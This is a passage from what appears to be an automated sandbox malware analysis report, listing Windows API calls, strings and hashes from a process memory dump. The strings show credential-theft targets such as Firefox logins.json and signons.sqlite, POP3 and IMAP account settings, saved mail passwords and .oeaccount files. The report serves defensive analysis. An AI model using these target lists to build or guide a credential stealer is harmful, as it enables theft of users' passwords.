                                                            • API ID: sprintf$memset$_mbscpy
                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                            • API String ID: 3402215030-3842416460
                                                            • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                            • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                            • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                            • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                              • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                              • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                                              • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                                              • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                                              • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                            • strlen.MSVCRT ref: 0040F139
                                                            • strlen.MSVCRT ref: 0040F147
                                                            • memset.MSVCRT ref: 0040F187
                                                            • strlen.MSVCRT ref: 0040F196
                                                            • strlen.MSVCRT ref: 0040F1A4
                                                            • memset.MSVCRT ref: 0040F1EA
                                                            • strlen.MSVCRT ref: 0040F1F9
                                                            • strlen.MSVCRT ref: 0040F207
                                                            • _strcmpi.MSVCRT ref: 0040F2B2
                                                            • _mbscpy.MSVCRT ref: 0040F2CD
                                                            • _mbscpy.MSVCRT ref: 0040F30E
                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                                            • String ID: logins.json$none$signons.sqlite$signons.txt
                                                            • API String ID: 1613542760-3138536805
                                                            • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                            • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                            • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                            • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                            • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                            • API String ID: 1012775001-1343505058
                                                            • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                            • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                            • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                            • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                            • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Library$FreeLoad
                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                            • API String ID: 2449869053-232097475
                                                            • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                            • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                            • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                            • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wcsstr.MSVCRT ref: 0040426A
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                            • _mbscpy.MSVCRT ref: 004042D5
                                                            • _mbscpy.MSVCRT ref: 004042E8
                                                            • strchr.MSVCRT ref: 004042F6
                                                            • strlen.MSVCRT ref: 0040430A
                                                            • sprintf.MSVCRT ref: 0040432B
                                                            • strchr.MSVCRT ref: 0040433C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                            • String ID: %s@gmail.com$www.google.com
                                                            • API String ID: 3866421160-4070641962
                                                            • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                            • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                            • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                            • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                            • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                            • API String ID: 2360744853-2229823034
                                                            • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                            • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                            • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                            • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • strchr.MSVCRT ref: 004100E4
                                                            • _mbscpy.MSVCRT ref: 004100F2
                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                            • _mbscpy.MSVCRT ref: 00410142
                                                            • _mbscat.MSVCRT ref: 0041014D
                                                            • memset.MSVCRT ref: 00410129
                                                              • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                              • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                                            • memset.MSVCRT ref: 00410171
                                                            • memcpy.MSVCRT ref: 0041018C
                                                            • _mbscat.MSVCRT ref: 00410197
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                            • String ID: \systemroot
                                                            • API String ID: 912701516-1821301763
                                                            • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                            • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                            • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                            • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                            • strchr.MSVCRT ref: 0040327B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringstrchr
                                                            • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                            • API String ID: 1348940319-1729847305
                                                            • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                            • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                            • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                            • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                            • API String ID: 3510742995-3273207271
                                                            • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                            • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                            • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                            • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                            • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                            • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                            • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                            • GetSysColor.USER32(0000000F), ref: 0040B472
                                                            • DeleteObject.GDI32(?), ref: 0040B4A6
                                                            • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                            • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DeleteImageLoadObject$Color
                                                            • String ID:
                                                            • API String ID: 3642520215-0
                                                            • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                            • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                            • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                            • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                            • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                            • GetDC.USER32(00000000), ref: 004072FB
                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                            • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                            • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                            • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                            • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                            • String ID:
                                                            • API String ID: 1999381814-0
                                                            • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                            • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                            • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                            • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                            • API String ID: 1297977491-3883738016
                                                            • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                            • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                            • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                            • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm$__aullrem
                                                            • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                            • API String ID: 643879872-978417875
                                                            • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                            • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                            • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                            • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040810E
                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                            • LocalFree.KERNEL32(?,?,?,?,?,00000000,76DBEB20,?), ref: 004081B9
                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                              • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                            • String ID: POP3_credentials$POP3_host$POP3_name
                                                            • API String ID: 524865279-2190619648
                                                            • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                            • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                            • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                            • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$CountInfomemsetstrchr
                                                            • String ID: 0$6
                                                            • API String ID: 2300387033-3849865405
                                                            • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                            • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                            • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                            • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _mbscat$memsetsprintf
                                                            • String ID: %2.2X
                                                            • API String ID: 125969286-791839006
                                                            • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                            • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                            • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                            • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                            • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                              • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                              • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                              • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                              • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                              • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                              • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                                              • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                                            • CloseHandle.KERNEL32(?), ref: 00444206
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                            • String ID: ACD
                                                            • API String ID: 1886237854-620537770
                                                            • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                            • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                            • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                            • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 004091EC
                                                            • sprintf.MSVCRT ref: 00409201
                                                              • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                              • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                              • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                                            • SetWindowTextA.USER32(?,?), ref: 00409228
                                                            • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                            • String ID: caption$dialog_%d
                                                            • API String ID: 2923679083-4161923789
                                                            • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                            • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                            • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                            • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                            • memset.MSVCRT ref: 00410246
                                                            • memset.MSVCRT ref: 00410258
                                                              • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                                            • memset.MSVCRT ref: 0041033F
                                                            • _mbscpy.MSVCRT ref: 00410364
                                                            • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                            • String ID:
                                                            • API String ID: 3974772901-0
                                                            • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                            • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                            • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                            • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wcslen.MSVCRT ref: 0044406C
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                            • strlen.MSVCRT ref: 004440D1
                                                              • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                              • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                            • memcpy.MSVCRT ref: 004440EB
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                            • String ID:
                                                            • API String ID: 577244452-0
                                                            • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                            • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                            • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                            • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040C02D
